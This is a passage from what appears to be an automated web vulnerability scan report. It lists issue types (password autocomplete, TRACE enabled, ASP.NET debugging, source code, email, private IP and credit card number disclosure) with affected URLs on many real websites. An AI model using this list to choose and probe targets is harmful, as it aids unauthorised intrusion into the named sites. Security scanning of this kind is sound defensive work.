11.114. http://www.burstnet.com/enlightn/3847/F156/

11.115. http://www.corecommerce.com/

11.116. http://www.echalk.com/

11.117. http://www.echalk.com/impact/on-the-road/

11.118. http://www.echalk.com/impact/what-echalk-means-to-me/

11.119. http://www.ekkows.0479228880.com/

11.120. http://www.eshopfitters.co.uk/

11.121. http://www.extramusical.com/catalog/index.php

11.122. http://www.falkirk.gov.uk/

11.123. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_australia.gif

11.124. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_belgium.gif

11.125. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_brazil.gif

11.126. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_canada.gif

11.127. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_china.gif

11.128. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_denmark.gif

11.129. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_france.gif

11.130. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_germany.gif

11.131. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_india.gif

11.132. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_italy.gif

11.133. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_japan.gif

11.134. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_korea_south.gif

11.135. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_netherlands.gif

11.136. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_singapore.gif

11.137. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_spain.gif

11.138. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_sweden.gif

11.139. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_switzerland.gif

11.140. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_taiwan.gif

11.141. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_uk.gif

11.142. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/flag_usa.gif

11.143. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/country_select_images/$FILE/world_map_web.gif

11.144. http://www.gelifesciences.com/aptrix/upp01077.nsf/AttachmentsByTitle/homepage_images/$FILE/ge-corner-low-right.gif

11.145. http://www.gelifesciences.com/aptrix/upp01077.nsf/content/homepage

11.146. http://www.gelifesciences.com/aptrix/upp01077.nsf/content/homepage_country_select

11.147. http://www.gelifesciences.com/ezm/profiles.nsf/CCformat.js

11.148. http://www.gelifesciences.com/ezm/profiles.nsf/ListCountriesAsArray.js

11.149. http://www.gelifesciences.com/ezm/profiles.nsf/ListInitialCountryRedirectsAsArray.js

11.150. http://www.gelifesciences.com/favicon.ico

11.151. http://www.gelifesciences.com/icons/ecblank.gif

11.152. http://www.gelifesciences.com/images/flags/default_flag.gif

11.153. http://www.gelifesciences.com/newheaderimages/cart.gif

11.154. http://www.gelifesciences.com/newheaderimages/gelslogo4.gif

11.155. http://www.gelifesciences.com/newheaderimages/gles2.gif

11.156. http://www.gelifesciences.com/newheaderimages/nav1link.gif

11.157. http://www.gelifesciences.com/newheaderimages/top_nav_bg.GIF

11.158. http://www.gelifesciences.com/newheaderimages/top_nav_blue_arrow.GIF

11.159. http://www.gelifesciences.com/newheaderimages/top_nav_divider.gif

11.160. http://www.gelifesciences.com/newheaderimages/top_nav_left_end.gif

11.161. http://www.gelifesciences.com/newheaderimages/top_nav_right_end.gif

11.162. http://www.gelifesciences.com/servlet/J5P

11.163. http://www.gitzitinc.com/store/

11.164. http://www.googleadservices.com/pagead/aclk

11.165. http://www.greatfabricsonline.com/

11.166. http://www.internetnatrgovina.com/

11.167. http://www.ipandgo.net/

11.168. http://www.mmabasket.com/

11.169. http://www.nexternal.com/ecommerce/oscommerce_shopping_cart.asp

11.170. https://www.regnow.com/checkout/cart/edit

11.171. https://www.regnow.com/checkout/cart/new/13799-1/13799-2

11.172. https://www.regnow.com/checkout/cart/view

11.173. http://www.sapiens.co.uk/

11.174. http://www.shopgrandmasattic.com/

11.175. http://www.teleflora.com/js/tf_homepagejs.asp

11.176. http://www.vehix.com/

11.177. http://www.vehix.com/

11.178. http://www.vehix.com/!.gif

11.179. http://www.vehix.com/Default.css

11.180. http://www.vehix.com/Scripts/Framework/jquery-1.4.1.js

11.181. http://www.vehix.com/__ssobj/ard.png

11.182. http://www.vehix.com/_css/Buttons/Main.css

11.183. http://www.vehix.com/_css/Buttons/Search.css

11.184. http://www.vehix.com/_css/Themes/VehixAds.css

11.185. http://www.vehix.com/_css/Themes/VehixMain.css

11.186. http://www.vehix.com/_images/Backgrounds/PageContentShadow_1003x50.jpg

11.187. http://www.vehix.com/_images/Backgrounds/SYC_Background_307x134.png

11.188. http://www.vehix.com/_images/Backgrounds/ToolbarShadow_10x10.png

11.189. http://www.vehix.com/_images/Backgrounds/VehixToolbarBackground.jpg

11.190. http://www.vehix.com/_images/Backgrounds/grayBevel_10x9.gif

11.191. http://www.vehix.com/_images/Backgrounds/grayGradient_682x156.jpg

11.192. http://www.vehix.com/_images/Backgrounds/vehixBodyBackground.jpg

11.193. http://www.vehix.com/_images/Backgrounds/whiteBevel_10x9.gif

11.194. http://www.vehix.com/_images/Buttons/Continue_109x25.gif

11.195. http://www.vehix.com/_images/Buttons/Dynamic/BlueC_1x25.gif

11.196. http://www.vehix.com/_images/Buttons/Dynamic/BlueL_8x25.gif

11.197. http://www.vehix.com/_images/Buttons/Dynamic/BlueR_8x25.gif

11.198. http://www.vehix.com/_images/Buttons/SearchUsed_109x25.gif

11.199. http://www.vehix.com/_images/Buttons/Story1_20x19.gif

11.200. http://www.vehix.com/_images/Buttons/Story2_20x19.gif

11.201. http://www.vehix.com/_images/Buttons/Story3_20x19.gif

11.202. http://www.vehix.com/_images/Buttons/Story4_20x19.gif

11.203. http://www.vehix.com/_images/Buttons/Story5_20x19.gif

11.204. http://www.vehix.com/_images/Buttons/ToolbarGreen_55x21.gif

11.205. http://www.vehix.com/_images/Icons/MagnifyingGlass_13x13.gif

11.206. http://www.vehix.com/_images/Icons/Person_11x13.gif

11.207. http://www.vehix.com/_images/Logos/FindYourRide_89x36.gif

11.208. http://www.vehix.com/_images/Logos/Vehix_115x36.gif

11.209. http://www.vehix.com/_images/Separators/Toolbar.gif

11.210. http://www.vehix.com/_images/Separators/Vertical84_1x18.gif

11.211. http://www.vehix.com/_images/Separators/horizontalGray2Tone.gif

11.212. http://www.vehix.com/_images/Separators/verticalGray2Tone.gif

11.213. http://www.vehix.com/_images/newsletter_1.png

11.214. http://www.vehix.com/_images/spacer.gif

11.215. http://www.vehix.com/_js/Vehix.Web.Consumer.Portal.Main.js

11.216. http://www.vehix.com/_js/framework/jquery-1.4.2.min.js

11.217. http://www.vehix.com/_scripts/Vehix.Collections.js

11.218. http://www.vehix.com/_scripts/Vehix.Presentation.Research.js

11.219. http://www.vehix.com/_scripts/Vehix.Presentation.js

11.220. http://www.vehix.com/_scripts/s_code.js

11.221. http://www.vehix.com/_styleSheets/tagFrame.css

11.222. http://www.vehix.com/_styleSheets/userControlsResearchSelector.css

11.223. http://www.vehix.com/_userControls/HeadlineModule.css

11.224. http://www.vehix.com/_userControls/HeadlineModule.js

11.225. http://www.vehix.com/_userControls/HeroSpot.css

11.226. http://www.vehix.com/_userControls/HomePageLatestReviews.css

11.227. http://www.vehix.com/_userControls/RequiredZip.css

11.228. http://www.vehix.com/_userControls/SelectCategoryModule.css

11.229. http://www.vehix.com/_userControls/researchYourNextCar.css

11.230. http://www.vehix.com/_userControls/top10FeaturedControl.css

11.231. http://www.vehix.com/_userControls/usedVehicleSearchPanel.css

11.232. http://www.vehix.com/dealer/_userControls/FindLocalDealers.css

11.233. http://www.vehix.com/favicon.ico

11.234. http://www.vehix.com/research/_userControls/FreePriceQuotePanel.css

11.235. http://www.vehix.com/research/_userControls/SelectMakeModule.css

11.236. http://www.vehix.com/research/_userControls/SponsorModule.css

11.237. http://www.vehix.com/research/_userControls/YearSelectionModule.css

11.238. http://www.vehix.com/video/_images/play_arrow24x24.png

11.239. http://www.verizonbusiness.com/us/

11.240. http://www.vitexo.de/

11.241. http://www.vitexo.de/support/server.php

11.242. http://x.ligatus.com/blank.gif

11.243. http://x.ligatus.com/cgi-bin/ivw/CP/20468-1220/79-822/97603-57123-_96851-70827-_95287-47761-//

12. Password field with autocomplete enabled

12.1. http://forum.mailsite.com/

12.2. https://mobile.westnet.com.au/

12.3. https://mobile.westnet.com.au/Default.aspx

12.4. https://myaccount.westnet.com.au/Login.aspx

12.5. https://secure1.wn.com.au/agents/login.aspx

12.6. https://shop.widevoip.com/authentication.php

12.7. https://webmail.westnet.com.au/

12.8. http://www.allvoip.gr/

12.9. http://www.allvoip.gr/

12.10. http://www.ekkows.0479228880.com/

12.11. http://www.host7x24.com/auth/login.php

12.12. http://www.internetnatrgovina.com/

12.13. http://www.mailsite.com/portal/

12.14. http://www.mailsite.com/portal/cases/

12.15. http://www.mailsite.com/portal/cases/cases.asp

12.16. http://www.mailsite.com/portal/download.asp

12.17. http://www.mailsite.com/portal/unsubscribe.asp

12.18. http://www.mailsite.com/portal/updateprofile.asp

12.19. http://www.mavi1.org/forum/

12.20. http://www.mmabasket.com/

12.21. https://www.new.onebox.com/login

12.22. http://www.siyamiozkan.com.tr/forum/

12.23. http://www.siyamiozkan.com.tr/forum/

12.24. http://www.vitexo.de/

12.25. http://www.westnet.com.au/fetchtv/

12.26. http://www.westnet.com.au/fetchtv/

12.27. http://www.westnet.com.au/fetchtv/

12.28. http://www.westnet.com.au/help/images/bgs/main1.gif

12.29. http://www.westnet.com.au/help/images/bgs/main1.gif

12.30. http://www.westnet.com.au/help/images/bgs/main1.gif

12.31. http://www.westnet.com.au/help/images/bgs/top_nav_bg.gif

12.32. http://www.westnet.com.au/help/images/bgs/top_nav_bg.gif

12.33. http://www.westnet.com.au/help/images/bgs/top_nav_bg.gif

12.34. http://www.westnet.com.au/help/images/nav/nav_light_blue.gif

12.35. http://www.westnet.com.au/help/images/nav/nav_light_blue.gif

12.36. http://www.westnet.com.au/help/images/nav/nav_light_blue.gif

12.37. http://www.westnet.com.au/help/images/nav/ovr-1.gif

12.38. http://www.westnet.com.au/help/images/nav/ovr-1.gif

12.39. http://www.westnet.com.au/help/images/nav/ovr-1.gif

12.40. http://www.westnet.com.au/help/images/nav/ovr-2.gif

12.41. http://www.westnet.com.au/help/images/nav/ovr-2.gif

12.42. http://www.westnet.com.au/help/images/nav/ovr-2.gif

12.43. http://www.westnet.com.au/help/images/nav/ovr-3.gif

12.44. http://www.westnet.com.au/help/images/nav/ovr-3.gif

12.45. http://www.westnet.com.au/help/images/nav/ovr-3.gif

12.46. http://www.westnet.com.au/help/images/nav/ovr-4.gif

12.47. http://www.westnet.com.au/help/images/nav/ovr-4.gif

12.48. http://www.westnet.com.au/help/images/nav/ovr-4.gif

12.49. http://www.westnet.com.au/help/images/nav/ovr-5.gif

12.50. http://www.westnet.com.au/help/images/nav/ovr-5.gif

12.51. http://www.westnet.com.au/help/images/nav/ovr-5.gif

12.52. http://www.westnet.com.au/help/images/nav/ovr-6.gif

12.53. http://www.westnet.com.au/help/images/nav/ovr-6.gif

12.54. http://www.westnet.com.au/help/images/nav/ovr-6.gif

12.55. http://www.westnet.com.au/index.html

12.56. http://www.westnet.com.au/index.html

12.57. http://www.westnet.com.au/index.html

12.58. http://www.westnet.com.au/js/components/iptvnumberchecker/component_iptvnumberchecker.nocache.js

12.59. http://www.westnet.com.au/js/components/iptvnumberchecker/component_iptvnumberchecker.nocache.js

12.60. http://www.westnet.com.au/js/components/iptvnumberchecker/component_iptvnumberchecker.nocache.js

12.61. http://www.westnet.com.au/products/residential.html

12.62. http://www.westnet.com.au/products/residential.html

12.63. http://www.westnet.com.au/products/residential.html

13. Source code disclosure

13.1. http://printingcanvas.co.uk/

13.2. http://www.hp.com/cma/ng/lib/hpanalytics_common.js

14. ASP.NET debugging enabled

14.1. http://www.active24.co.uk/Default.aspx

14.2. http://www.active24.com/Default.aspx

14.3. http://www.active24.no/Default.aspx

14.4. http://www.cisp.com/Default.aspx

15. Referer-dependent response

15.1. http://chileadmin.com/phpinfo.php

15.2. http://pixel.fetchback.com/serve/fb/pdc

15.3. http://www.facebook.com/plugins/like.php

15.4. http://www.facebook.com/plugins/likebox.php

15.5. http://www.yourwebsitevalue.com/getsearchbox.cgi

15.6. http://www.youtube.com/v/ERP00q_xcuQ

16. Cross-domain POST

16.1. http://www.eshopfitters.co.uk/

16.2. http://www.eshopfitters.co.uk/recent_projects.php

16.3. http://www.eshopfitters.co.uk/recent_projects_info.php

17. Cross-domain Referer leakage

17.1. http://ad.doubleclick.net/adj/veh.homepage.dfp/null/null/null/null/Vehix/sechp

17.2. http://ad.yieldmanager.com/pixel

17.3. http://cm.g.doubleclick.net/pixel

17.4. http://cm.g.doubleclick.net/pixel

17.5. http://cm.g.doubleclick.net/pixel

17.6. http://fls.doubleclick.net/activityi

17.7. http://fls.doubleclick.net/activityi

17.8. http://fls.doubleclick.net/activityi

17.9. http://freezone.iinet.net.au/channels/freezone-partners

17.10. http://googleads.g.doubleclick.net/pagead/ads

17.11. http://googleads.g.doubleclick.net/pagead/ads

17.12. http://googleads.g.doubleclick.net/pagead/ads

17.13. http://ib.adnxs.com/seg

17.14. http://j.tmimgcdn.com/main.js

17.15. https://myaccount.westnet.com.au/Login.aspx

17.16. http://myhelp.westnet.com.au/pages/releaseview.action

17.17. http://onebox.extole.com/offers/23073174/share

17.18. http://pixel.fetchback.com/serve/fb/pdc

17.19. http://printingcanvas.co.uk/your-print-canvas-c-21.html

17.20. https://secure1.wn.com.au/agents/login.aspx

17.21. http://shops.oscommerce.com/live_shops_frameset_header.php

17.22. http://shops.oscommerce.com/live_shops_frameset_header.php

17.23. http://shops.oscommerce.com/live_shops_frameset_header.php

17.24. http://shops.oscommerce.com/live_shops_frameset_header.php

17.25. http://shops.oscommerce.com/live_shops_frameset_header.php

17.26. http://shops.oscommerce.com/live_shops_frameset_header.php

17.27. http://shops.oscommerce.com/live_shops_frameset_header.php

17.28. http://shops.oscommerce.com/live_shops_frameset_header.php

17.29. http://shops.oscommerce.com/live_shops_frameset_header.php

17.30. http://shops.oscommerce.com/live_shops_frameset_header.php

17.31. http://shops.oscommerce.com/live_shops_frameset_header.php

17.32. http://shops.oscommerce.com/live_shops_frameset_header.php

17.33. http://shops.oscommerce.com/live_shops_frameset_header.php

17.34. http://shops.oscommerce.com/live_shops_frameset_header.php

17.35. http://shops.oscommerce.com/live_shops_frameset_header.php

17.36. http://shops.oscommerce.com/live_shops_frameset_header.php

17.37. http://shops.oscommerce.com/live_shops_frameset_header.php

17.38. http://shops.oscommerce.com/live_shops_frameset_header.php

17.39. http://shops.oscommerce.com/live_shops_frameset_header.php

17.40. http://shops.oscommerce.com/live_shops_frameset_header.php

17.41. http://shops.oscommerce.com/live_shops_frameset_header.php

17.42. http://shops.oscommerce.com/live_shops_frameset_header.php

17.43. http://store.mandriva.com/just_added.php

17.44. http://store.mandriva.com/product_info.php

17.45. http://tags.mediaforge.com/pix/189/

17.46. http://www.active24.co.uk/custom_asp/defaultjs.asp

17.47. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

17.48. http://www.corecommerce.com/

17.49. http://www.eshopfitters.co.uk/recent_projects.php

17.50. http://www.eshopfitters.co.uk/recent_projects_info.php

17.51. http://www.eshopfitters.co.uk/recent_projects_info.php

17.52. http://www.extramusical.com/livehelp/livehelp_js.php

17.53. http://www.facebook.com/plugins/like.php

17.54. http://www.facebook.com/plugins/like.php

17.55. http://www.facebook.com/plugins/likebox.php

17.56. http://www.facebook.com/plugins/likebox.php

17.57. http://www.facebook.com/plugins/likebox.php

17.58. http://www.facebook.com/plugins/likebox.php

17.59. http://www.facebook.com/plugins/likebox.php

17.60. http://www.facebook.com/plugins/likebox.php

17.61. http://www.facebook.com/plugins/likebox.php

17.62. http://www.facebook.com/plugins/likebox.php

17.63. http://www.facebook.com/plugins/likebox.php

17.64. http://www.gelifesciences.com/servlet/J5P

17.65. http://www.google.com/search

17.66. http://www.munichmyway.com/

17.67. http://www.munichmyway.com/ecommerce/products/prodDetail.cfm

17.68. http://www.nexternal.com/ecommerce/oscommerce_shopping_cart.asp

17.69. http://www.oscommerce-manager.com/

17.70. http://www.redstage.com/magento2/

17.71. http://www.vehix.com/

17.72. http://www.vehix.com/

17.73. http://www.vehix.com/tagFrame.aspx

17.74. http://www.vehix.com/tagFrame.aspx

17.75. http://www.verizonbusiness.com/us/topnav.xml

17.76. http://www8.hp.com/us/en/services/services-detail.html

18. Cross-domain script include

18.1. http://finans.turk.net/altin/

18.2. http://finans.turk.net/borsa/

18.3. http://fls.doubleclick.net/activityi

18.4. http://forums.oscommerce.com/

18.5. http://freezone.iinet.net.au/channels/

18.6. http://freezone.iinet.net.au/channels/freezone-partners

18.7. http://freezone.iinet.net.au/channels/freezone/sport

18.8. http://googleads.g.doubleclick.net/pagead/ads

18.9. http://googleads.g.doubleclick.net/pagead/ads

18.10. http://onebox.extole.com/offers/23073174/share

18.11. http://pixel.fetchback.com/serve/fb/pdc

18.12. http://printingcanvas.co.uk/

18.13. http://printingcanvas.co.uk/your-print-canvas-c-21.html

18.14. https://secure1.wn.com.au/agents/login.aspx

18.15. https://secure1.wn.com.au/agents/lost_password.aspx

18.16. http://welcome.hp.com/country/w1/en/support.html

18.17. http://whatsonsingapore.com/

18.18. http://www.allvoip.gr/

18.19. http://www.antarctica.gov.au/

18.20. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

18.21. http://www.casagrandehospital.com/

18.22. http://www.corecommerce.com/

18.23. http://www.echalk.com/

18.24. http://www.echalk.com/impact/on-the-road/

18.25. http://www.echalk.com/impact/what-echalk-means-to-me/

18.26. http://www.eshopfitters.co.uk/

18.27. http://www.eshopfitters.co.uk/recent_projects.php

18.28. http://www.eshopfitters.co.uk/recent_projects_info.php

18.29. http://www.extramusical.com/catalog/index.php

18.30. http://www.ezosc.com/

18.31. http://www.facebook.com/plugins/like.php

18.32. http://www.facebook.com/plugins/likebox.php

18.33. http://www.gelifesciences.com/aptrix/upp01077.nsf/content/homepage_country_select

18.34. http://www.mailsite.com/

18.35. http://www.mailsite.com/Contacts/default.asp

18.36. http://www.mailsite.com/company/customers.asp

18.37. http://www.mailsite.com/contacts/

18.38. http://www.mailsite.com/portal/

18.39. http://www.mailsite.com/portal/cases/

18.40. http://www.mailsite.com/portal/cases/cases.asp

18.41. http://www.mailsite.com/portal/download.asp

18.42. http://www.mailsite.com/portal/trial.asp

18.43. http://www.mailsite.com/portal/unsubscribe.asp

18.44. http://www.mailsite.com/portal/updateprofile.asp

18.45. http://www.mailsite.com/products/MailSite-version-9-Whats-New.asp

18.46. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

18.47. http://www.mailsite.com/services/avupdates/

18.48. http://www.mailsite.com/support/

18.49. http://www.medianewsgroup.com/Pages/default.aspx

18.50. http://www.new.onebox.com/home

18.51. http://www.nexternal.com/ecommerce/oscommerce_shopping_cart.asp

18.52. http://www.oscommerce.com/about/news,135

18.53. http://www.pepperdine.edu/

18.54. http://www.redstage.com/magento2/

18.55. https://www.regnow.com/checkout/cart/edit

18.56. https://www.regnow.com/checkout/cart/view

18.57. http://www.teleflora.com/

18.58. http://www.templatemonster.com/oscommerce-templates.php

18.59. http://www.turk.net/

18.60. http://www.upc.nl/upclive/

18.61. http://www.vehix.com/

18.62. http://www.victoria.ac.nz/home/

18.63. http://www5.turk.net/twitter_net/default.aspx

18.64. http://www8.hp.com/us/en/services/it-services.html

18.65. http://www8.hp.com/us/en/services/services-detail.html

19. TRACE method is enabled

19.1. http://a.ligatus.com/

19.2. http://allvoip.gr/

19.3. http://chadon.nl/

19.4. http://count1.123stat.com/

19.5. http://d.xp1.ru4.com/

19.6. http://d1.openx.org/

19.7. http://intlstore.mozilla.org/

19.8. http://mods4rides.com/

19.9. http://pixel.fetchback.com/

19.10. http://shop.widevoip.com/

19.11. https://shop.widevoip.com/

19.12. http://store.mandriva.com/

19.13. http://support.magneticone.com/

19.14. http://upc.d2.sc.omtrdc.net/

19.15. http://www.allvoip.gr/

19.16. http://www.amberetc.co.uk/

19.17. http://www.antarctica.gov.au/

19.18. http://www.brodit24.de/

19.19. http://www.casagrandehospital.com/

19.20. http://www.cvtelecom.cv/

19.21. http://www.echalk.com/

19.22. http://www.ezosc.com/

19.23. http://www.internetnatrgovina.com/

19.24. http://www.ipandgo.net/

19.25. http://www.mavi1.org/

19.26. http://www.mavideniz1.org/

19.27. http://www.oscommerce-manager.com/

19.28. http://www.redstage.com/

19.29. http://www.servercentral.com/

19.30. http://www.siyamiozkan.com.tr/

19.31. http://www.upc.nl/

19.32. http://www.vitexo.de/

19.33. https://www.widevoip.com/

19.34. http://www.yourwebsitevalue.com/

20. Directory listing

21. Email addresses disclosed

21.1. http://acceleart.com/shop/mts/ext/equalheight/equalheight.js

21.2. http://ah8.facebook.com/js/conversions/tracking.js

21.3. http://cdn.betaeasy.com/betaeasy.js

21.4. http://chadon.nl/

21.5. http://chileadmin.com/phpinfo.php

21.6. http://forums.oscommerce.com/

21.7. http://freezone.iinet.net.au/js/jquery.cookie.js

21.8. http://h18030.www1.hp.com/survey/source/enterprise1_2.js

21.9. http://h18030.www1.hp.com/survey/source/na_enterprise.js

21.10. http://myhelp.westnet.com.au/display/home/2008/03/14/Hoax+Email+and+Internet+Security+Alert

21.11. http://myhelp.westnet.com.au/pages/releaseview.action

21.12. http://myhelp.westnet.com.au/s/1116/1/_/labels-javascript

21.13. http://shops.oscommerce.com/live_shops_frameset_header.php

21.14. http://store.mandriva.com/just_added.php

21.15. http://teleflora.edgesuite.net/images/vendors/00005557/omniture/s_code.js

21.16. http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css

21.17. http://www.3dcart.com/oscommerce_vs_3dcart.html

21.18. http://www.accesscontrolid.com/catalog/index.php

21.19. http://www.bigcommerce.com/bigcommerce-vs-oscommerce.php

21.20. http://www.cardinal.com/businesses/medicineshoppe/

21.21. http://www.cardinal.com/mps/CacheProxyServlet/colorPalette/default/browserVendor/Netscape/browserName/Navigator/browserVersion/unknown/locale/en/forwardurl/mps/themes/html/Cardinal/js/jquery.hoverIntent.js

21.22. http://www.cisp.com/

21.23. http://www.cisp.com/products/cisp/restora_backup/

21.24. http://www.corecommerce.com/js/jquery.innerfade.js

21.25. http://www.echalk.com/js/jquery.colorbox.js

21.26. http://www.eshopfitters.co.uk/

21.27. http://www.eshopfitters.co.uk/recent_projects.php

21.28. http://www.eshopfitters.co.uk/recent_projects_info.php

21.29. http://www.ezosc.com/

21.30. http://www.falkirk.gov.uk/home.aspx

21.31. http://www.gelifesciences.com/servlet/J5P

21.32. http://www.gelifesciences.com/servlet/J5P

21.33. http://www.gitzitinc.com/store/

21.34. http://www.google.com/s

21.35. http://www.hp.com/cma/metrics/survey/na_num_clicks.js

21.36. http://www.mailsite.com/

21.37. http://www.mailsite.com/Contacts/default.asp

21.38. http://www.mailsite.com/company/customers.asp

21.39. http://www.mailsite.com/contacts/

21.40. http://www.mailsite.com/nav_functions.js

21.41. http://www.mailsite.com/portal/

21.42. http://www.mailsite.com/portal/cases/

21.43. http://www.mailsite.com/portal/cases/cases.asp

21.44. http://www.mailsite.com/portal/download.asp

21.45. http://www.mailsite.com/portal/trial.asp

21.46. http://www.mailsite.com/portal/unsubscribe.asp

21.47. http://www.mailsite.com/portal/updateprofile.asp

21.48. http://www.mailsite.com/products/MailSite-version-9-Whats-New.asp

21.49. http://www.mailsite.com/products/mailsite-email-and-calendar-server-software.asp

21.50. http://www.mailsite.com/services/avupdates/

21.51. http://www.mailsite.com/support/

21.52. http://www.mavideniz1.org/forum/

21.53. http://www.medianewsgroup.com/_catalogs/masterpage/SiteCatalystCode_H_17.js

21.54. http://www.new.onebox.com/home

21.55. http://www.new.onebox.com/how-it-works

21.56. http://www.new.onebox.com/onebox-cms-public/dms/common/javascript/mootools1-2_corenmore.js

21.57. http://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/javascript/loginFunctions.js

21.58. http://www.new.onebox.com/pricing-receptionist

21.59. https://www.new.onebox.com/features/mobile-apps/android

21.60. https://www.new.onebox.com/features/mobile-apps/blackberry

21.61. https://www.new.onebox.com/features/mobile-apps/iphone

21.62. https://www.new.onebox.com/login

21.63. https://www.new.onebox.com/onebox-cms-public/dms/common/javascript/mootools1-2_corenmore.js

21.64. https://www.new.onebox.com/onebox-cms-public/dms/onebox/resources/javascript/loginFunctions.js

21.65. https://www.new.onebox.com/pricing-receptionist_b

21.66. http://www.pepperdine.edu/scripts/app-autocomplete/google-www-report.xml

21.67. http://www.plaxo.com/css/m/js/abc_launcher.js

21.68. http://www.plaxo.com/css/m/js/basic.js

21.69. http://www.redstage.com/magento2/

21.70. http://www.redstage.com/magento2/js/colorbox/jquery.colorbox-min.js

21.71. https://www.regnow.com/checkout/cart/edit

21.72. https://www.regnow.com/checkout/cart/new/13799-1/13799-2

21.73. https://www.regnow.com/checkout/cart/view

21.74. https://www.regnow.com/eds_new.html

21.75. https://www.regnow.com/favicon.ico

21.76. http://www.servercentral.com/accountcenter

21.77. http://www.servercentral.com/agentspartners

21.78. http://www.servercentral.com/billinginquiry

21.79. http://www.servercentral.com/billingpaymentfaqs

21.80. http://www.servercentral.com/makeapayment

21.81. http://www.servercentral.com/support

21.82. http://www.servercentral.com/whyservercentral

21.83. http://www.telecom.pt/InternetResource/PTSite/PT

21.84. http://www.telecom.pt/InternetResource/PTSite/PT/Canais/Sustentabilidade/

21.85. http://www.turk.net/Assets/scripts/jQuery/jquery.innerfade.js

21.86. http://www.vehix.com/_scripts/s_code.js

21.87. http://www.westnet.com.au/fetchtv/

21.88. http://www.westnet.com.au/js/jquery.cookie.js

21.89. http://www.wiktel.com/

21.90. http://www8.hp.com/us/en/scripts/mootools-1.2.4-more-yc.js

22. Private IP addresses disclosed

22.1. http://ah8.facebook.com/js/conversions/tracking.js

22.2. http://connect.facebook.net/tr_TR/all.js

22.3. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.4. http://www.facebook.com/extern/login_status.php

22.5. http://www.facebook.com/extern/login_status.php

22.6. http://www.facebook.com/extern/login_status.php

22.7. http://www.facebook.com/extern/login_status.php

22.8. http://www.facebook.com/extern/login_status.php

22.9. http://www.facebook.com/extern/login_status.php

22.10. http://www.facebook.com/extern/login_status.php

22.11. http://www.facebook.com/extern/login_status.php

22.12. http://www.facebook.com/plugins/like.php

22.13. http://www.facebook.com/plugins/like.php

22.14. http://www.facebook.com/plugins/like.php

22.15. http://www.facebook.com/plugins/like.php

22.16. http://www.facebook.com/plugins/likebox.php

22.17. http://www.facebook.com/plugins/likebox.php

22.18. http://www.facebook.com/plugins/likebox.php

22.19. http://www.facebook.com/plugins/likebox.php

22.20. http://www.facebook.com/plugins/likebox.php

22.21. http://www.facebook.com/plugins/likebox.php

22.22. http://www.facebook.com/plugins/likebox.php

22.23. http://www.facebook.com/plugins/likebox.php

22.24. http://www.facebook.com/plugins/likebox.php

22.25. http://www.facebook.com/plugins/likebox.php

22.26. http://www.facebook.com/plugins/likebox.php

22.27. http://www.facebook.com/plugins/likebox.php

22.28. http://www.facebook.com/plugins/likebox.php

22.29. http://www.facebook.com/plugins/likebox.php

22.30. http://www.facebook.com/plugins/likebox.php

23. Credit card numbers disclosed

23.1. http://googleads.g.doubleclick.net/pagead/ads

23.2. http://www.extramusical.com/catalog/index.php

23.3. http://www.servercentral.com/files/u1/Credit_Card_Authorization_2-2.pdf

24. Robots.txt file

24.1. http://423-jqs-965.mktoresp.com/webevents/visitWebPage

24.2. http://ad.doubleclick.net/activity

24.3. http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js

24.4. http://allvoip.gr/favicon.ico

24.5. http://c.gelifesciences.com/b/ss/gelifegelifeprod/1/H.15.1/s61482006243895

24.6. http://cm.g.doubleclick.net/pixel

24.7. http://count1.123stat.com/count.pl

24.8. http://d.xp1.ru4.com/um

24.9. http://d1.openx.org/ajs.php

24.10. http://feeds.bbci.co.uk/news/rss.xml

24.11. http://fls.doubleclick.net/activityi

24.12. http://forums.oscommerce.com/

24.13. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071977981/

24.14. http://h41174.www4.hp.com/4/hp/us/en/commercial/presales.awareness/services/all/%7C/r61/%7Cus/en/services/it-services.html/1314572112@x01,x02,x31,x32,x33,Top1,Top2,Top3,Top,Left1,Left2,Left3,x04,x41,x42,x43,x44,x45,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Frame1,Frame2,x11,x12,x13,x14,x15

24.15. http://hp-www.baynote.net/baynote/tags3/common

